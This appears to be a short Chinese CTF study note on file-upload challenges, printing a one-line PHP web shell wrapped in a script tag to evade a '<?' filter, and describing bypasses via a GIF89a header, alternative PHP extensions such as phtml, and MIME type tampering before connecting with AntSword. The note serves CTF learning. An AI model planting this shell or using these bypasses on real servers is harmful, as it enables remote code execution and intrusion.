1.上传了一个简单的木马,显示不能使用<?,所以我们试试使用短标签<%(这个一般会被禁止使用)或者用<script> 标签
绕过。
<script language="php">eval($_REQUEST[feng])</script>
学习:短标签也就是使用<%代替<?,不过短标签可以被禁用,为了兼容性考虑一般的php都是用<?的。
2.
说文件类型不是图片,可是又要上传一个图片。不懂他是怎么检测的。
猜想是不是像misc那样对文件头进行检测。
GIF89a可以通过。
抓包看看
改包也不行,疑惑了。
那只能试试哪种文件类型不在黑名单里了,
查了一下php类的文件后缀有:php2, php3, php4, php5, phps, pht, phtm, phtml
确定了是phtml后
然后又卡住了。
又看了一遍发现是MIME检验,直接修改,上传成功。
之后就是用蚁剑了。